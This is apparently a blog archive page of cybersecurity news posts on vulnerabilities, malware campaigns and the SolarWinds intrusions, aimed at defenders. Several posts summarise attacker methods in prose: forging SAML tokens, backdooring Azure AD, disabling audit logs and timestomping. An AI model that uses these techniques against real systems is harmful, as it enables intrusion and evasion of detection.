Category Archives: Hacking

Drupal fixed a new flaw related PEAR Archive_Tar library

Drupal development team released security updates to address a vulnerability that resides in the PEAR Archive_Tar third-party library.

The Drupal development team has released security updates to address the CVE-2020-36193 vulnerability in the PEAR Archive_Tar third-party library.

The PEAR Archive_Tar class provides handling of tar files in PHP. It supports creating, listing, extracting, and adding to tar files.

The developers released core patches for the version 9.1, 9.0, 8.9, and 7 of the popular CMS.

The CVE-2020-36193 flaw is caused by the improper check of symbolic links, leading to Tar.php in Archive_Tar allowing for write operations with directory traversal.

“The Drupal project uses the pear Archive_Tar library, which has released a security update that impacts Drupal.” reads the advisory.

The flaw could be exploited by attackers if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.

The flaw affects Archive_Tar through version 1.4.11, the issue was fixed by disallowing symlinks to out-of-path filenames.

According to the advisory published by Drupal, the flaw could be mitigated by disabling uploads of .tar, .tar.gz, .bz2, or .tlz files.

The development team recommends to install the latest version

  • If you are using version 9.1, update to Drupal 9.1.3.
  • If you are using version 9.0, update to Drupal 9.0.11.
  • If you are using version 8.9, update to 8.9.13.
  • If you are using version 7, update to 7.78.

Versions of Drupal 8 prior to 8.9.x are end-of-life and do not receive security coverage.

The CVE-2020-36193 vulnerability is linked to the CVE-2020-28948 flaw that was fixed by the developers in November with the release of emergency security updates.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Drupal fixed a new flaw related PEAR Archive_Tar library appeared first on Security Affairs.

Dovecat crypto-miner is targeting QNAP NAS devices

QNAP is warning customers of a new piece of malware dubbed Dovecat that is targeting NAS devices to mine cryptocurrency.

Taiwanese vendor QNAP has published a security advisory to warn customers of a new piece of malware named Dovecat that is targeting NAS devices. The malware was designed to abuse NAS resources and mine cryptocurrency.

The malware targets QNAP NAS devices exposed online that use weak passwords.

“QNAP Systems, Inc. (QNAP), a leading computing, networking and storage solution innovator, today issued a statement in response to recent user reports that a new type of malware named dovecat is targeting QNAP NAS and installing bitcoin miners without user consent.” reads the security advisory published by the vendor.

“According to analysis, QNAP NAS can become infected when they are connected to the Internet with weak user passwords.”

Since the end of 2020, several users reported infections ([1], [2]) to their devices, they noticed the presence of the “dedpma” and “dovecat” processes that were causing a high processor load and saturating the RAM of the NAS.

In November, the vendor published a post warning its customers that NAS devices with dovecat and dedpma running processes were infected by Bitcoin cryptocurrency miner.

“If such processes are running on recent FW (4.4.x), it means the system has been compromised and is running a Bitcoin miner.” states the post published by QNAP.

“In the meantime, please update the NAS firmware and Malware Remover in the App Center to the latest version if not done already to ensure the latest security patches are applied on the NAS.”

According to the experts, the same Bitcoin malware also infected Synology NAS devices.

QNAP recommends users to take the following measures to prevent these infections:

  • Update QTS to the latest version.
  • Install the latest version of Malware Remover.
  • Install Security Counselor and run with Intermediate Security Policy (or above).
  • Install a firewall.
  • Enable Network Access Protection to protect accounts from brute force attacks.
  • Use stronger admin passwords.
  • Use stronger passwords for database administrators.
  • Disable SSH and Telnet services if not in use.
  • Disable unused services and apps.
  • Avoid using default port numbers (80, 443, 8080, and 8081).

In December, QNAP released security updates to fix eight vulnerabilities that could be exploited by attackers to over unpatched NAS devices.

The list of vulnerabilities addressed by QNAP is available here, it includes XSS and command injection issues. The flaws fixed by the vendor are rated as medium and high severity security.

In September, while the AgeLocker ransomware was continuing to target QNAP NAS systems, the Taiwanese vendor urged customers to update the firmware and apps.

In early August, the Taiwanese company urged its users to update the Malware Remover app to prevent NAS devices from being infected by the QSnatch malware.

In June the company also warned of eCh0raix ransomware attacks that targeted its NAS devices.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, QNAP)

The post Dovecat crypto-miner is targeting QNAP NAS devices appeared first on Security Affairs.

Passwords stolen via phishing campaign available through Google search

Bad ops of operators of a phishing campaign exposed credentials stolen in attacks and made them publicly available through Google queries. 

Check Point Research along with experts from cybersecurity firm Otorio shared details on their investigation into a large-scale phishing campaign that targeted thousands of global organizations.

The campaign has been active since August, the attackers used emails that masqueraded as Xerox scan notifications that were urging recipients into opening a malicious HTML attachment. This trick allowed the attackers to bypass Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials.


The experts noticed that operators behind the phishing campaign focused on Energy and Construction companies, but they accidentally exposed credentials stolen in attacks that were publicly viewable with a simple Google search. 

Operators of a phishing campaign targeting the construction and energy sectors exposed credentials stolen in attacks that were publicly viewable with a simple Google search. 

“Interestingly, due to a simple mistake in their attack chain, the attackers behind the phishing campaign exposed the credentials they had stolen to the public Internet, across dozens of drop-zone servers used by the attackers. With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses:  a gift to every opportunistic attacker.” reads the post published by Check Point.

Once the victim double-clicked the HTML file, a blurred image with a preconfigured email within the document is opened in the browser.

Upon launching the HTML file, a JavaScript code will be executed in the background, it gathers the password, sends the data to the attackers’ server, and redirect the user to a legitimate Office 365 login page.

Phishers used both unique infrastructure and compromised WordPress websites used to store the stolen data.

“We discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named “go.php”, “post.php”, “gate.php”, “rent.php” or “rest.php”) and processed all incoming credentials from victims of the phishing attacks.” continues the post.

“Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations. The more widely recognized a reputation is, the chances are higher that the email will not be blocked by security vendors”

The emails were sent from a Linux server hosted on Microsoft’s Azure, they were often sent by using PHP Mailer 6.1.5 and delivered using 1&1 email servers.

Attackers also sent out spam messages through compromised email accounts to make messages appear to be from legitimate sources. 

Data sent to the drop-zone servers were saved in a publicly visible file that was indexable by Google. This means that they were available to anyone with a simple Google search.

The analysis of a subset of ~500 stolen credentials revealed that victims belong to a wide range of target industries, including IT, healthcare, real estate, and manufacturing.

Check Point shared its findings with Google.

Experts noticed that the JavaScript encoding used in this campaign was the same used in another phishing campaign from May 2020, a circumstance that suggests that the group threat actor is behind the two campaigns.

The report also includes Indicators of Compromise (IoCs).

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, phishing)

The post Passwords stolen via phishing campaign available through Google search appeared first on Security Affairs.

Experts warn of scanning activity for critical SAP SolMan flaw after the release of exploit

Experts warn of automated scanning activity for servers affected by a critical SAP SolMan flaw after the release of an exploit code.

Experts warn of an automated scanning activity for servers affected by vulnerabilities in SAP software, attackers started probing the systems after the release of an exploit for the critical CVE-2020-6207 flaw in SAP Solution Manager (SolMan), version 7.2. 

“SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.” reads the advisory.

SAP Solution Manager is a product developed by the software company SAP SE, it offers end-to-end application lifecycle management to streamline business processes and proactively address improvement options, increasing efficiency and decreasing risk within SAP customers’ existing maintenance agreements and managing the application lifecycle.

The vulnerability resides in the EEM Manager component and is caused by a missing authentication check, it has been rated as critical and received the CVSS base score of 10.0.

A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance.

“While exploits are released regularly online, this hasn’t been the case for SAP vulnerabilities, for which publicly available exploits have been limited.” reads a post published by Onapsis. “The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own.”

SolMan allows to centralize the management of all SAP and non-SAP systems that are within an SAP landscape. It performs multiple actions, including implementation, support, monitoring and maintenance of all enterprise mission-critical SAP applications, including ERP, CRM, HCM, SCM, BI, financials and others. If an attacker is able to gain access to SolMan, it could compromise any system connected to it.


In early 2020, experts from Onapsis Research Labs researchers reported that in default configurations, unauthenticated remote attackers could be able to execute operating system commands on the satellite systems and achieve full privileges on the associated SAP systems. SAP addressed the flaw in March 2020 (SAP Security note #2890213), so SAP customers who have proper patching in place shouldn’t be affected by this exploit. 

A remote unauthenticated attacker could exploit this flaw to execute highly privileged administrative tasks in the connected SAP SMD Agents. Every system connected to the SolMan can be potentially affected.

Below some of the possible exploitation scenarios:

  • Shutting down any SAP system in the landscape (not only SAP SolMan) 
  • Causing IT control deficiencies impacting financial integrity and privacy leading to regulatory compliance violations such as Sarbanes-Oxley (SOX), GDPR and others 
  • Deleting any data in the SAP systems, including key data that can cause business disruption
  • Assigning superuser (e.g. SAP_ALL) privileges to any existing or new user, enabling those users to run business operations that would normally require specific privileges to bypass other Segregation of Duties (SoD) controls
  • Reading sensitive data from the database, including employee and customer personal information

Last week, Dmitry Chastuhin released a PoC exploit code for CVE-2020-6207 for educational purposes.

“This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager” read the description published on GitHub.

After the release of the exploit code, security researchers at Onapsis have observed a scanning activity in the wild for vulnerable systems.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolMan)

The post Experts warn of scanning activity for critical SAP SolMan flaw after the release of exploit appeared first on Security Affairs.

SVR Attacks on Microsoft 365

FireEye is reporting the current known tactics that the SVR used to compromise Microsoft 365 cloud data as part of its SolarWinds operation:

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  • Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  • Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  • Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  • Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Lots of details here, including information on remediation and hardening.

The more we learn about the this operation, the more sophisticated it becomes.

In related news, MalwareBytes was also targeted.

SolarWinds Attack: Microsoft sheds lights into Solorigate second-stage activation

Microsoft’s report provides details of the entire SolarWinds attack chain with a deep dive in the second-stage activation of malware and tools.

Microsoft published a new report that includes additional details of the SolarWinds supply chain attack. The new analysis shad lights on the handover from the Solorigate DLL backdoor to the Cobalt Strike loader.

The attackers focused on separate these two components of the attack chain as much as possible to evade detection.

The report provides details regarding the Solorigate second-stage activation that allowed the attacker to deliver Cobalt Strike loaders, such as Teardrop, and Raindrop.

The known information on the attacks confirms that the Solorigate DLL backdoor was compiled at the end of February 2020 and distributed to the potential victims in late March.  Then attackers removed the Solorigate backdoor code from SolarWinds’ build environment in June 2020.

Considering that the Solorigate backdoor was designed to stay dormant for at least two weeks, the analysis of the timeline suggests that attackers spent approximately a month selecting the victims and preparing unique Cobalt Strike implants as well as command-and-control (C2) infrastructure. This means that the “hands-on-keyboard activity” likely started as early as May.

“The removal of the backdoor-generation function and the compromised code from SolarWinds binaries in June could indicate that, by this time, the attackers had reached a sufficient number of interesting targets, and their objective shifted from deployment and activation of the backdoor (Stage 1) to being operational on selected victim networks, continuing the attack with hands-on-keyboard activity using the Cobalt Strike implants (Stage 2).” states the report published by Microsoft.

Solarwinds Timeline-of-Solorigate-attacks

Microsoft experts analyzed forensic data across the entire environment of impacted organizations to discover how the attackers made lateral movements and how long they remaining within their target networks.

The experts conducted a deep analysis of data collected by Microsoft 365 Defender data and Microsoft Defender telemetry.

Solarwinds 2

While investigating the attack, Microsoft identified several second-stage malware and tools, including TEARDROP, Raindrop, and also other custom loaders for the Cobalt Strike beacon.

“TEARDROP, Raindrop, and the other custom Cobalt Strike Beacon loaders observed during the Solorigate investigation are likely generated using custom Artifact Kit templates.” continues the report. “Each custom loader loads either a Beacon Reflective Loader or a preliminary loader that subsequently loads the Beacon Reflective Loader. Reflective DLL loading is a technique for loading a DLL into a process memory without using the Windows loader.”

Microsoft added that additional attacker tactics, anti-forensic behavior, and operational security allowed them to avoid detection and outstand for operations security (OpSec) best practices.

Below a list of some examples of why threat actors stand out for their professional OpSec methodology and anti-forensic behavior:

Some examples of why these attackers stand out for their professional OpSec methodology and anti-forensic behavior are listed below:

  • Methodic avoidance of shared indicators for each compromised host. Attackers prepared a unique Cobalt Strike DLL implant for each machine and avoided at any cost overlap and reuse of folder name, file name, export function names, C2 domain/IP, HTTP requests, timestamp, file metadata, config, and child process launched. 
  • Camouflage and blending into the environment. Attackers always renamed tools and binaries they used (e.g., ADFIND legit tool) and placed them in folders that mimicked existing programs and files already present on a machine.
  • Disabling event logging using AUDITPOL and re-enabling it afterward.
  • To avoid noisy network enumeration activities (such as repeated NSLOOKUP or LDAP queries) being detected, the attackers created special firewall rules to minimize outgoing packets for certain protocols. Then the attackers methodically removed the rules after the reconnaissance was completed.
  • Lateral movement activities were never executed without preparation. 
  • Attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.

“As we continue to gain deeper understanding of the Solorigate attack, we get a clearer picture of the skill level of the attackers and the extent of planning they put into pulling off one of the most sophisticated attacks in recent history. The combination of a complex attack chain and a protracted operation means that defensive solutions need to have comprehensive cross-domain visibility into attacker activity and provide months of historical data with powerful hunting tools to investigate as far back as necessary.” concludes Microsoft.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post SolarWinds Attack: Microsoft sheds lights into Solorigate second-stage activation appeared first on Security Affairs.

Cisco fixed multiple flaws in Cisco SD-WAN products and Smart Software Manager Satellite Web UI

Cisco fixed multiple flaws in Cisco SD-WAN products that could allow an unauthenticated, remote attacker to execute attacks against its devices.

Cisco released security updates to address multiple flaws in Cisco SD-WAN products could allow an unauthenticated, remote attacker to execute attacks against vulnerable devices.

These vulnerabilities impact devices running the following Cisco SD-WAN Software:

  • IOS XE SD-WAN Software
  • SD-WAN vBond Orchestrator Software
  • SD-WAN vEdge Cloud Routers
  • SD-WAN vEdge Routers
  • SD-WAN vManage Software
  • SD-WAN vSmart Controller Software

The first issue, tracked as CVE-2021-1300, is a Cisco SD-WAN buffer overflow vulnerability that could be exploited by an unauthenticated, remote attacker to trigger a buffer overflow condition.

“A vulnerability in Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a buffer overflow condition.” reads the security advisory. “A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.”

The vulnerability stems from the incorrect handling of IP traffic. An attacker can trigger the flaw by sending crafted IP traffic through an affected device, which may cause a buffer overflow when the traffic is processed. The flaw has been rated with a CVSS Base Score of 9.8.

The IT giant said that there are no workarounds that address this vulnerability.

The second flaw addressed by the company is a Cisco SD-WAN buffer overflow vulnerability tracked as CVE-2021-1301.

A flaw resides in the NETCONF subsystem, an authenticated, remote attacker could exploit the vulnerability to trigger a denial of service (DoS) condition on an affected device or system.

The vulnerability is caused by the insufficient input validation of user-supplied input that is read by the system during the establishment of an SSH connection.

“An attacker could exploit this vulnerability by submitting a crafted file to be read by the affected system. A successful exploit could allow the attacker to cause a buffer overflow that could result in a DoS condition on the affected device or system.” states the advisory.

The flaw has been rated with a CVSS Base Score of 6.5, the company said that are no workarounds that address this vulnerability.

Cisco also addressed critical Command Injection vulnerabilities in Smart Software Manager Satellite Web UI.

The flaws, tracked as CVE-2021-1138, CVE-2021-1140, and CVE-2021-1142, affect Cisco Smart Software Manager Satellite releases 5.1.0 and earlier and have been fixed with the release of versions 6.3.0 and later.

“Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system.” reads the advisory.

The Cisco Product Security Incident Response Team (PSIRT) is not aware of public announcements or threat actors exploiting the above issues in attacks in the wild.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Cisco)

The post Cisco fixed multiple flaws in Cisco SD-WAN products and Smart Software Manager Satellite Web UI appeared first on Security Affairs.

Logic bugs found in popular apps, including Signal and FB Messenger

Flaws in popular messaging apps, such as Signal and FB Messenger allowed to force a target device to transmit audio to an attacker device.

Google Project Zero security researcher Natalie Silvanovich found multiple flaws in popular video conferencing apps such as Signal and FB Messenger, that allowed to force a target device to transmit audio of the surrounding environment to an attacker device.

The bugs are similar to a logic flaw discovered in January 2019 in Group FaceTime that allowed to hear a person’s audio before he answers,

The logic flaws affect Signal, Google Duo, Facebook Messenger, JioChat, and Mocha messaging apps, the good news is that they have been already fixed by the development teams.

“The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device.” reads the post published by Silvanovich. “While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine — an attack scenario I had never seen considered on any platform — made me wonder whether other state machines had similar vulnerabilities as well. “

Most of video conferencing applications use WebRTC, while peers could establish WebRTC connections by exchanging call set-up information in Session Description Protocol (SDP), this process is called signalling.

In a typical WebRTC connection, the caller starts off by sending an SDP offer to the received, which in turn responds with an SDP answer. 

The messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. 

“Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.” continues the post.

The logical flaws also potentially allowed the caller to force a callee device to transmit audio or video data.

Silvanovich discovered that data is shared even if the receiver has not interacted with the application to answer the call.

Signal attack
  • Signal addressed the logical bug in the Android version in September 2019. “The application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings”
  • JioChat (flaw in the Android app fixed in July 2020) and Mocha (flaw in the Android app fixed in August 2020). “This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.
  • Facebook Messenger addressed the bug in November 2020.
  • Google Duo solved the bug in December 2020.

“The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.” concludes the expert.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, mobile apps)

The post Logic bugs found in popular apps, including Signal and FB Messenger appeared first on Security Affairs.

Livecoin halted operations after the December attack

The Russian cryptocurrency exchange Livecoin has announced it is terminating its operation following the December cyberattack. 

The Russian cryptocurrency exchange was hacked on Christmas Eve, it published a message on its website warning customers to stop using its services.

“Dear clients, we ask you to stop using our service in all meanings: don’t deposit funds, don’t trade, don’t use API. We are under a carefully planned attack, which has been prepared, as we assume, over the last few months. We lost control of all of our servers, backend and nodes. Thus, we were not able to stop our service in time.” reads the message published on the website. “Our news channels were compromised as well. At the moment, we partially control frontend, and so we’re able to place this announcement. We’re fighting hard to get back our servers, nodes and funds, we’re working 24/7. News and next update will come up in the next few days. We’re working in contact with local police authorities. We really do our best to overcome this issue.”


Livecoin recommended users to stop depositing funds and making transactions, it also notified local law enforcement.

The administrators of the platforms informed its customers to have lost control of some of its servers, the attack was not opportunistic, it appears to be well planned.

The attack took place nighttime, between December 23 and December 24, the attackers modified exchange rates to absurd values (15 times their ordinary values). The Bitcoin exchange rate was set to over $450,000/BTC, while the value of ETH was increased from $600/ETH up to $15,000

Once pumped out the exchange rates, the attackers began cashing out accounts, making huge profits.

Now, Livecoin announced it is terminating its activity following the December cyberattack. 

“Dear clients, as we reported earlier, our service were under attack in December 2020. Investigation is in active phase right now. Our service has been damaged hard in technical and financial way. There is no way to continue operative business in these conditions, so we take a hard decision to close the business and paying the remaining funds to clients.” reads the announcement published by the exchange.

“Our clients have to contact us via email to get payments after passing verification procedure. We accept claims for payments for the next 2 months. 17 March 2021 is the last day of accepting your requests, after this date no new requests will be accepted.”

The company announced that it will accept claims for payments until 17 March 2021.

CoinTelegraph reported that some users have refused to send their personal data to Livecoin fearing for their security and privacy. A user revealed that Livecoin is requesting documents and data that could be used by ill-intentioned to conduct scams ad frauds, including passport scans, residence information, high-resolution selfies, and data about the first transaction on the exchange.

“We apologize for an existing situation and ask you to keep calm, including your conversation with support officers. Our service and team bear hard losses as well as our clients. In case of abuse and threats in conversation, the claim can be declined.” Livecoin added.

“We have to warn you about tons of fake groups in different messengers and other channels, where people represent themselves as our team members, insiders, hackers etc. Participating in these groups you run a high risk, because we have no any groups. The only official statements are made on this website. Do not send money to anyone. You don’t have to pay to get back your funds from us, the only thing you need is to send a request and follow simple procedure.”

At the time of this writing, Livecoin’s old website domain displays the message “Oops! Time is over Livecoin….”.

As usual, some users speculate that this could be an Exit Scam.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Livecoin)

The post Livecoin halted operations after the December attack appeared first on Security Affairs.

FireEye releases an auditing tool to detect SolarWinds hackers’ activity

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.

Cybersecurity firm FireEye has released a report that sheds the light on the SolarWinds attack and the way hackers breached its networks.

The experts explained how the UNC2452 and other threat actors breached the infrastructure and moved laterally from on-premises networks to the Microsoft 365 cloud. The paper, titled Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 also provides tips for organizations on how proactively harden their environments.

FireEye also released a tool named Azure AD Investigator that could be used by organizations to discover if their organization has been breached by the SolarWinds hackers, tracked by the security firm as UNC2452.

This FireEye GitHub repository contains a PowerShell module that can be used to detect artifacts associated with the UNC2452’s intrusion and other threat actor activity.

“Some indicators are “high-fidelity” indicators of compromise, while other artifacts are so called “dual-use” artifacts.” states FireEye. “Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verification will be required for these.”

FireEye pointed out that the tool is read-only, which means that it does not make any changes to the Microsoft 365 environment.

The company warns that the tool could not identify a compromise 100% of the time, and is not able to distinguish if an artifact is the result of a legitimate admin activity or threat actor activity.

Mandiant researchers explained that UNC2452 and other threat actors primarily used four techniques for lateral movements:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

The Cybersecurity and Infrastructure Security Agency (CISA)’s Cloud Forensics team has also released a PowerShell-based tool, dubbed Sparrow, that can that helps administrators to detect anomalies and potentially malicious activities in Azure/Microsoft 365 environments.

CrowdStrike experts also decided to create their own tool because they face difficulties in using Azure’s administrative tools to enumerate privileges assigned to third-party resellers and partners in their Azure tenant.

“CrowdStrike launches CrowdStrike Reporting Tool for Azure (CRT), a free community tool that will help organizations quickly and easily review excessive permissions in their Azure AD environments, help determine configuration weaknesses, and provide advice to mitigate risk.” states the security firm.

“Throughout our analysis, we experienced first hand the difficulties customers face in managing Azure’s administrative tools to know what relationships and permissions exist within Azure tenants, particularly with third-party partner/resellers, and how to quickly enumerate them. We found it particularly challenging that many of the steps required to investigate are not documented, there was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.”

The CrowdStrike Reporting Tool for Azure (CRT) tool could be used by administrators to analyze their Microsoft Azure environment and review the privileges assigned to third-party resellers and partners.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds APT)

The post FireEye releases an auditing tool to detect SolarWinds hackers’ activity appeared first on Security Affairs.

Sophisticated Watering Hole Attack

Google’s Project Zero has exposed a sophisticated watering-hole attack targeting both Windows and Android:

Some of the exploits were zero-days, meaning they targeted vulnerabilities that at the time were unknown to Google, Microsoft, and most outside researchers (both companies have since patched the security flaws). The hackers delivered the exploits through watering-hole attacks, which compromise sites frequented by the targets of interest and lace the sites with code that installs malware on visitors’ devices. The boobytrapped sites made use of two exploit servers, one for Windows users and the other for users of Android

The use of zero-days and complex infrastructure isn’t in itself a sign of sophistication, but it does show above-average skill by a professional team of hackers. Combined with the robustness of the attack code — ­which chained together multiple exploits in an efficient manner — the campaign demonstrates it was carried out by a “highly sophisticated actor.”


The modularity of the payloads, the interchangeable exploit chains, and the logging, targeting, and maturity of the operation also set the campaign apart, the researcher said.

No attribution was made, but the list of countries likely to be behind this isn’t very large. If you were to ask me to guess based on available information, I would guess it was the US — specifically, the NSA. It shows a care and precision that it’s known for. But I have no actual evidence for that guess.

All the vulnerabilities were fixed by last April.

Malwarebytes ‘s email systems hacked by SolarWinds attackers

Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year.

Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms that were hit by Solarwinds attackers, after FireEye, Microsoft, and CrowdStrike.

The intrusion took place last year, the company pointed out that hackers exploited another attack vector and did use SolarWinds Orion software.

The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.

“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”

On December 15, Microsoft Security Response Center warned the security firm of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.

Malwarebytes said it learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15.

With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes discovered that the attackers leveraged a dormant email protection product within our Office 365 tenant that allowed access to a limited subset of internal company emails. The security firms explained that it does not use Azure cloud services in its production environments.

Malwarebytes performed a deep investigation through its infrastructure, inspecting its source code, build and delivery processes, but it confirmed that internal systems showed no evidence of unauthorized access or compromise. This means that the customers of the security firm were not impacted using its anti-malware solution.

“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.

“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Malwarebytes ‘s email systems hacked by SolarWinds attackers appeared first on Security Affairs.

Raindrop, a fourth malware employed in SolarWinds attacks

The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads.

Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware named Raindrop for lateral movement and deploying additional payloads.

Raindrop is the fourth malware that was discovered investigating the SolarWinds attack after the SUNSPOT backdoor, the Sunburst/Solorigate backdoor and the Teardrop tool. 

Raindrop (Backdoor.Raindrop) is a loader that was used by attackers to deliver a Cobalt Strike payload. Raindrop is similar to the Teardrop tool, but while the latter was delivered by the initial Sunburst backdoor, the former was used for spreading across the victim’s network. 

“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.

Symantec investigated four Raindrop infections until today, the malware was employed in the last phases of the attacks against a very few selected targets.


Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use different packers and different Cobalt Strike configurations.

“To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol.” continues the post.

“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”

In the following tables there are key differences between the two tools:

PAYLOAD FORMATCustom, reusing features from PE format. It may be possible to reuse the packer with a range of different payloads supplied as PE DLLs with automatic conversion.Shellcode only.
PAYLOAD EMBEDDINGBinary blob in data section.Steganography, stored at pre-determined locations within the machine code.
PAYLOAD ENCRYPTIONvisualDecrypt combined with XOR using long key.AES layer before decompression; separate XOR layer using one byte key after decompression.
OBFUSCATIONReading JPEG file. Inserted blocks of junk code, some could be generated using a polymorphic engine.Non-functional code to delay execution.
EXPORT NAMESExport names vary, in some cases names overlapping with Tcl/Tk projects.Export names overlap with Tcl/Tk projects.
STOLEN CODEByte-copy of machine code from pre-existing third-party components. The original code is distributed in compiled format only.Recompiled third-party source code.

The report published by Symantec includes IoCs and Yara Rules.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Raindrop, a fourth malware employed in SolarWinds attacks appeared first on Security Affairs.

FreakOut botnet target 3 recent flaws to compromise Linux devices

